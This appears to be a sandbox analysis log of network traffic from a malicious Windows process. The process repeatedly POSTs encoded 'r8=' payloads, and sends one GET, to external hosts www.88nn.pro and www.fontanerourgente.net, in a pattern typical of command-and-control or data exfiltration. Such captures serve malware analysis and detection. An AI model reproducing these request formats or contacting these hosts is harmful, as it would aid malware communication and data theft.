                                         1 | 192.168.2.4 | 49738 | 45.157.69.194 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 3, 2024 13:53:47.873534918 CEST | 731 | OUT | POST /l4rw/ HTTP/1.1
                                        Host: www.88nn.pro
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.88nn.pro
                                        Referer: http://www.88nn.pro/l4rw/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d
                                        Data Ascii: r8=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
                                         Sep 3, 2024 13:53:48.732291937 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:53:48 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "667cd175-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         2 | 192.168.2.4 | 49739 | 45.157.69.194 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 3, 2024 13:53:50.418615103 CEST | 751 | OUT | POST /l4rw/ HTTP/1.1
                                        Host: www.88nn.pro
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.88nn.pro
                                        Referer: http://www.88nn.pro/l4rw/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4e 39 68 70 67 4f 50 6e 62 4e 47 56 62 71 33 6d 31 36 56 76 4e 69 39 68 30 6d 39 74 37 75 6b 48 38 7a 55 45 6c 6b 48 34 76 4f 48 31 75 6b 70 49 69 34 54 61 48 4e 43 67 36 53 74 36 6f 4e 70 4e 32 70 57 4b 70 68 5a 56 70 55 30 78 48 5a 66 50 5a 63 77 72 49 78 63 51 41 63 45 42 69 7a 46 4c 54 4a 61 41 48 78 46 35 2f 34 79 4d 45 70 4d 6b 4c 71 43 78 52 6e 2b 74 6a 7a 42 47 7a 4e 62 50 4c 41 74 71 6c 31 31 43 30 56 58 6f 76 68 59 54 37 66 46 37 37 2f 67 63 78 76 46 30 73 32 64 5a 79 59 76 4b 38 37 62 54 63 67 67 77 36 59 3d
                                        Data Ascii: r8=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovhYT7fF77/gcxvF0s2dZyYvK87bTcggw6Y=
                                         Sep 3, 2024 13:53:51.267524004 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:53:51 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "667cd175-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         3 | 192.168.2.4 | 49740 | 45.157.69.194 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 3, 2024 13:53:52.967376947 CEST | 10833 | OUT | POST /l4rw/ HTTP/1.1
                                        Host: www.88nn.pro
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.88nn.pro
                                        Referer: http://www.88nn.pro/l4rw/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4d 46 68 70 53 57 50 31 6f 6c 47 53 62 71 33 76 56 36 57 76 4e 6a 68 68 77 43 68 74 37 71 72 48 2b 37 55 4c 6e 38 48 76 75 4f 48 38 75 6b 70 42 43 34 51 56 6e 4e 54 67 36 43 78 36 70 39 70 4e 32 70 57 4b 72 35 5a 43 74 49 30 69 58 5a 41 62 4a 63 38 38 59 78 30 51 41 55 36 42 69 6e 56 4c 6a 70 61 41 6d 42 46 36 4a 6b 79 4f 6b 70 4f 6e 4c 71 61 78 52 72 6c 74 6a 66 37 47 7a 34 54 50 4b 34 74 6f 67 63 42 59 6c 74 2f 2b 50 70 72 43 4a 2f 31 31 61 54 4e 52 54 66 4a 33 38 4b 52 4e 68 49 6a 4d 4e 62 4c 58 2b 56 6c 69 2f 5a 76 55 43 45 5a 72 6b 38 69 58 31 68 4d 31 4d 38 47 31 52 37 75 32 47 6a 65 6a 4a 53 56 4a 30 71 48 2f 66 38 7a 78 4c 45 54 64 34 57 51 37 68 6d 4c 33 72 6f 69 73 6c 38 71 69 36 76 4d 68 52 59 4b 66 6a 57 49 79 4d 34 41 79 67 2b 5a 2f 2f 48 6b 32 36 6f 4a 39 78 59 65 67 35 5a 4b 77 30 4f 57 70 4b 58 37 59 2b 36 6e 63 37 2b 37 79 42 2f 45 6a 67 72 75 36 71 67 [TRUNCATED]
                                        Data Ascii: r8=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29MFhpSWP1olGSbq3vV6WvNjhhwCht7qrH+7ULn8HvuOH8ukpBC4QVnNTg6Cx6p9pN2pWKr5ZCtI0iXZAbJc88Yx0QAU6BinVLjpaAmBF6JkyOkpOnLqaxRrltjf7Gz4TPK4togcBYlt/+PprCJ/11aTNRTfJ38KRNhIjMNbLX+Vli/ZvUCEZrk8iX1hM1M8G1R7u2GjejJSVJ0qH/f8zxLETd4WQ7hmL3roisl8qi6vMhRYKfjWIyM4Ayg+Z//Hk26oJ9xYeg5ZKw0OWpKX7Y+6nc7+7yB/Ejgru6qgEMrVSywziwRIliYJGyV25SssQTSr3wv1jr9JySfLZDidr8gDueDcKt9rO+Wwi98XNzIo0fejntyQ+zQMtxBc4xSkhtL/9VInugPVo/qYANhZoXCoEuHg/iss78TuQp6m1bveG8yG1Rtxnbxu3MGK5+jXmWIguuW+Z47pEk5z7dJ4p27EG4wbTAVOHj5/Kj1TxwXTWjHDW8JVGGiE8TvxO54wKnp++opGb3kB81tyMEpB5CPbYyMDuoLVo51SdqYUqr79etNleuybvriVimix5WiUaB1jT5jMsHx/pNb7eO+B5dDgE3lFt8u47WqduySZpEKxLShZXKl/aivY9GPh1DxSNdCJvGgOROCauOyBxrUeK+a2HELAdsW2C+XD/5/jpmgczfd9J8ilscoDvlDmx4c7QRAOqDAMQ0NbiV+MEcMqsLy8ccYvcYnfTCAJkHU//E4ELQc5BMm57yEQILFM3TdPON4HdyLmq1XJS99NONDGB+p4ZA7LJcT55yIfOsia4drNCkFi2olZK/0J83BnDqj+1cYilo347W36FWRRPhnt3LKaYKXEBsBnmUfEVqPT9YoWKiLTemWP5RuzLY8ClCTbESvgWVg5Qt3l/C9qXD+/garr7/GEvnda3Lc6ZLY/c2131Z83DB7TpOT7H/wlRIskcAoZUeeVFz [TRUNCATED]
                                         Sep 3, 2024 13:53:53.803051949 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:53:53 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "667cd175-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         4 | 192.168.2.4 | 49741 | 45.157.69.194 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 3, 2024 13:53:55.705291033 CEST | 478 | OUT | GET /l4rw/?r8=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.88nn.pro
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                         Sep 3, 2024 13:53:56.540819883 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:53:56 GMT
                                        Content-Type: text/html
                                        Content-Length: 138
                                        Connection: close
                                        ETag: "667cd175-8a"
                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         5 | 192.168.2.4 | 49742 | 37.187.158.211 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 3, 2024 13:54:01.633040905 CEST | 767 | OUT | POST /t3gh/ HTTP/1.1
                                        Host: www.fontanerourgente.net
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.fontanerourgente.net
                                        Referer: http://www.fontanerourgente.net/t3gh/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6d 69 66 6c 69 44 55 77 78 65 54 72 47 70 69 62 78 67 63 58 61 38 6e 65 53 49 35 57 6d 44 6c 54 4d 30 77 50 55 78 67 4a 66 4c 72 69 35 43 74 77 4b 69 30 37 73 4b 7a 4d 6c 39 7a 31 43 55 61 32 62 4a 4a 4b 57 2b 31 6e 70 53 56 33 2b 79 44 6b 34 49 6e 66 74 6d 5a 2f 70 62 78 66 79 4a 72 72 6f 71 62 46 5a 70 65 62 59 36 34 4c 69 4b 71 57 44 54 50 56 4a 73 58 64 52 4e 33 66 42 66 70 79 6c 35 66 42 35 54 36 47 47 39 6b 6b 31 39 6f 74 74 57 4f 6c 75 6e 79 6f 39 7a 44 33 6c 38 46 62 43 4e 67 71 70 6a 5a 6c 42 35 65 39 46 34 51 31 30 7a 52 52 31 77 3d 3d
                                        Data Ascii: r8=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlunyo9zD3l8FbCNgqpjZlB5e9F4Q10zRR1w==
                                         Sep 3, 2024 13:54:02.507756948 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:02 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                         Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         6 | 192.168.2.4 | 49743 | 37.187.158.211 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Sep 3, 2024 13:54:04.189402103 CEST | 787 | OUT | POST /t3gh/ HTTP/1.1
                                        Host: www.fontanerourgente.net
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.fontanerourgente.net
                                        Referer: http://www.fontanerourgente.net/t3gh/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 42 54 4d 52 55 50 62 54 45 4a 65 4c 72 69 33 69 74 78 58 79 30 73 73 4b 2f 75 6c 2f 33 31 43 55 65 32 62 4c 52 4b 52 4a 70 6f 72 43 56 31 79 53 44 71 37 34 6e 66 74 6d 5a 2f 70 62 6c 78 79 4a 6a 72 76 61 72 46 59 4c 32 63 57 61 34 49 6c 4b 71 57 48 54 50 52 4a 73 58 30 52 4a 58 35 42 5a 6c 79 6c 35 50 42 35 6e 4f 46 4e 39 6b 59 37 64 70 63 6b 47 7a 64 72 30 66 6c 38 6c 4c 73 76 38 42 64 4f 72 78 77 34 53 34 79 54 35 36 4f 59 2f 5a 42 35 77 73 59 75 2b 4a 41 65 45 55 78 36 4b 7a 6a 79 73 71 58 71 70 66 52 47 74 51 3d
                                        Data Ascii: r8=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxBTMRUPbTEJeLri3itxXy0ssK/ul/31CUe2bLRKRJporCV1ySDq74nftmZ/pblxyJjrvarFYL2cWa4IlKqWHTPRJsX0RJX5BZlyl5PB5nOFN9kY7dpckGzdr0fl8lLsv8BdOrxw4S4yT56OY/ZB5wsYu+JAeEUx6KzjysqXqpfRGtQ=
                                        Sep 3, 2024 13:54:05.265578032 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:04 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                        Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Página no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                        Sep 3, 2024 13:54:05.265598059 CEST224INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                        Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.ca
                                        Sep 3, 2024 13:54:05.265609026 CEST | 1236 | IN | Data Raw: 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61
                                        Data Ascii: nvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width
                                        Sep 3, 2024 13:54:05.265614986 CEST | 224 | IN | Data Raw: 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70
                                        Data Ascii: mojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JS
                                        Sep 3, 2024 13:54:05.265625000 CEST | 1236 | IN | Data Raw: 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65
                                        Data Ascii: ON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Work
                                        Sep 3, 2024 13:54:05.265635967 CEST | 224 | IN | Data Raw: 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d
                                        Data Ascii: ttings);</script><style id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                                        Sep 3, 2024 13:54:05.265652895 CEST | 1236 | IN | Data Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
